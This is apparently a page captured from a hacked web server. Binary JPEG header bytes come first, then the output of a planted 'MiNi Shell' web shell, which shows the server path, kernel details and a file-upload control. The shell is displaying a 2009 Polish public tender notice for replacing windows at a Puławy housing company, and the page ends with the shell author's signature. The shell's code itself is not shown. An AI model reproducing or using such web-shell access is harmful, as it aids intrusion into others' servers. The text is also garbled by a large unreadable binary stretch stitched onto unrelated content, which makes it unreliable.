JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090820/286082-N-2009.html

<p class="kh_header"><b>Puławy: Wymiana stolarki okiennej w budynku administracyjnym Zakładu Gospodarki Mieszkaniowej Spółka z o.o. w Puławach przy ul. Dęblińskiej 2</b><br>
<b>Numer ogłoszenia: 286082 - 2009; data zamieszczenia: 20.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej Spółka z o.o. w Puławach , ul. Dęblińska 2, 24-100 Puławy, woj. lubelskie, tel. 081 8863063, faks 081 8868140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej w budynku administracyjnym Zakładu Gospodarki Mieszkaniowej Spółka z o.o. w Puławach przy ul. Dęblińskiej 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie wymiany stolarki okiennej w budynku przy ul. Dęblińskiej 2 w Puławach .
Zakres robót obejmuje :
1)demontaż istniejących okien drewnianych w pomieszczeniach biurowych o wymiarach 102 x 212 cm w ilości 116 szt. oraz w piwnicy o wymiarach 85 x 110 cm w ilości 26 szt.
2)wywóz i utylizacja okien z demontażu
3)dostarczenie i montaż okien zgodnie z wykazem stolarki okiennej (załącznik nr 8)
4)wykonanie malowania ościeży (wewnętrznych i zewnętrznych) farbą emulsyjną z przygotowaniem powierzchni (reperacja tynku, przecierka).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wadium należy wnieść  w  wysokości   2 000  PLN ( słownie : dwa tysiące zł. ) .
2.Wadium należy wpłacić lub wnieść  przed upływem terminu  składania ofert tj. do 10.09.2009 r. do godz. 10:45.
3.Wadium winno obejmować cały okres związania ofertą. W sytuacji gdyby doszło do przedłużenia okresu związania ofertą wadium również  winno być przedłużone o odpowiedni okres. Może to mieć miejsce na skutek prośby  Zamawiającego skierowanej do Wykonawców przed upływem terminu związania z ofertami.
4.Wadium może być wniesione w jednej z form :
-Pieniężnej wpłaconej na rachunek  na  konto  Zamawiającego  w banku   PEKAO  SA O/Puławy   Nr : 02 1020 3219 0000 9802 0011 5048  : -Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, 
-Gwarancjach bankowych
-Gwarancjach ubezpieczeniowych
-Poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust.3 pkt 4 lit. b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r nr 25 ,poz.253,Nr 66,poz.596 i Nr 216,poz.1824) )
5.W przypadku wadium wnoszonego w pieniądzu Wykonawca winien załączyć do oferty kopię polecenia przelewu.  Wniesione wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajduje się na rachunku bankowym Zamawiającego. W przypadku wnoszenia wadium w innej formie  Wykonawca winien załączyć do oferty oryginał dokumentu. 
6.Zamawiający zwraca niezwłocznie wadium jeżeli:
    1) upłynął termin związania  ofertą,
    2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
        należytego wykonania tej umowy,
    3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
7.Zamawiający zwraca niezwłocznie wadium na pisemny wniosek Wykonawcy: 
    1) który wycofał ofertę przed upływem terminu do składania ofert;
    2) który został wykluczony z postępowania;
    3) którego oferta została odrzucona, przy czym złożenie wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
8.Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie pkt. 7 ust. 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniona zostanie czynność wykluczenia wykonawcy lub odrzucenia oferty Wykonawcy wniosą wadium w terminie określonym przez Zamawiającego.
9.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych oraz w pkt. VIII ust. 1 oraz pkt. IX ust.1-21 SIWZ lub pełnomocnictw , chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
    określonych w ofercie;
      2) nie wniósł zabezpieczenia należytego wykonania umowy;
      3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia może ubiegać się Wykonawca, który spełni poniższe 
    wymagania wynikające z art.22 ust.1 ustawy Prawo zamówień publicznych:
1)posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym,  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)dysponuje odpowiednio wykwalifikowanymi osobami zdolnymi do  
 wykonania zamówienia - w szczególności kierownik budowy posiadający 
 uprawnienia budowlane w branży konstrukcyjno - budowlanej,
b) posiada w pełni sprawne jednostki sprzętowe i urządzenia umożliwiające realizację zamówienia,
c)wykonał w ostatnich 5 latach co najmniej  3 roboty remontowe podobne do przedmiotu zamówienia 
3)znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: 
a)dostępność środków finansowych lub zdolność kredytowa wykonawcy potwierdzona przez bank wynosi co najmniej 50 000 zł. 
b)posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000 zł.
4)nie podlega wykluczeniu z postępowania o udzielenie zamówienia  zgodnie z art.24 ustawy Prawo Zamówień publicznych.
2.Udzielą na wykonane zamówienia  gwarancji na okres 60 m-cy licząc od daty odbioru
3.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców.
4.Jeżeli oferta wykonawców, została wybrana zamawiający może żądać przed zawarciem umowy w sprawie zamówienia umowy regulującej współprace tych wykonawców.
5.Z postępowania o udzielenie zamówienia wyklucza się  wykonawców zgodnie z art. 24 ust. 1 i 2 ustawy Prawo zamówień  publicznych. 
6.Oceniając zdolność Wykonawcy do wykonania zamówienia, Zamawiający bierze pod uwagę cechy podmiotowe Wykonawcy. Zamawiający bada, czy nie podlega on wykluczeniu z ubiegania się o zamówienie publiczne na podstawie art.24  ustawy , czy też podlega wykluczeniu na podstawie przesłanek  merytorycznych  opisanych w art. 22 ust. 1 pkt. 1-3 jako podmiot niezdolny do wykonania tego zamówienia, oraz czy nie podlega on wykluczeniu z ubiegania się o zamówienie publiczne na podstawie przesłanek formalno - prawnych opisanych w pkt. VIII  SIWZ.
7. Zamawiający zawiadamia niezwłocznie  Wykonawcę o  wykluczeniu  z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
8.  Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawcy powinni dostarczyć następujące dokumenty :
1. Wypełniony druk oferty (załącznik nr 1 do SIWZ)
2. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu w trybie artykułu 22 ust.1 ustawy  Prawo zamówień publicznych - zgodnie z załączonym formularzem Oświadczenia.(załącznik nr 2 do SIWZ)
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku gdy wykonawca jest osobą prawną informacja winna dotyczyć wszystkich aktualnych członków władz, wspólników lub partnerów.
4.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające odpowiednio, że Wykonawca nie  zalega z opłacaniem podatków, opłat lub  zaświadczenie , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu  - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.Aktualne zaświadczenie właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające odpowiednio, że Wykonawca nie  zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne  lub  zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu  - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.Informacja banku lub spółdzielczej kasy oszczędnościowo -rozliczeniowej , w której  Wykonawca posiada rachunek, potwierdzającą  wysokość  posiadanych środków  lub zdolność kredytową Wykonawcy na kwotę minimum 50 000.00 zł wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składanie ofert. 
9.Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 50 000.00 zł.
10.Dowód wniesienia wadium.
11.Wykaz robót wykonanych w ciągu ostatnich 5 lat zgodnie z załączonym formularzem (załącznik nr 3 do SIWZ), dotyczących wykonanaia robót budowlanych podobnych do przedmiotu zamówienia, wartości oraz daty i miejsca wykonania - oraz załączenie dokumentów, że roboty zostały wykonane z należytą starannością.
12.Wykaz osób i podmiotów z uwzględnieniem kierownictwa robót - zgodnie z załączonym formularzem  (załącznik nr 4a do SIWZ): ,  które  będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, a także zakresu wykonywanych przez nich czynności. Do wykazu należy dołączyć kserokopię uprawnień kierownika budowy  o specjalności  konstrukcyjno budowlanej i zaświadczenia o jego wpisie na listę członków właściwej izby samorządu zawodowego. 
13.Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 12, wykonawca 
wskazał osoby, którymi będzie dysponował
14.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca (załącznik nr 4b do SIWZ)
15.Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt. 14, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował
16.Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich 3 lat, w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie (zgodnie z załącznikiem nr 4c do SIWZ)
17. Wykaz podwykonawców z powierzonym zakresem robót (jeżeli będą uczestniczyć wg załącznika nr 4d do SIWZ).
18. Wykaz stawek kalkulacyjnych do robót dodatkowych i zamiennych  - zgodnie z  załączonym formularzem (załącznik nr 5 do SIWZ): 
19.Wypełniony formularz cenowy  określający  cenę oferty ( załącznik nr 6 do SIWZ); 
20. Parafowany projekt umowy (załącznik nr 7 do SIWZ)
21. dokumenty dopuszczające wyrób do obrotu  : certyfikat kwalifikacyjny obejmujący okna, oraz okucia lub aprobatę techniczną dopuszczającą wyrób do obrotu towarowego i stosowania w  budownictwie.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgm.pulawy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej Spółka z o.o. w Puławach,
ul. Dęblińska 2,
24-100 Puławy,
pok. 214 II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 10:45, miejsce: Zakład Gospodarki Mieszkaniowej Spółka z o.o. w Puławach,
ul. Dęblińska 2,
24-100 Puławy,
pok. 115 I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com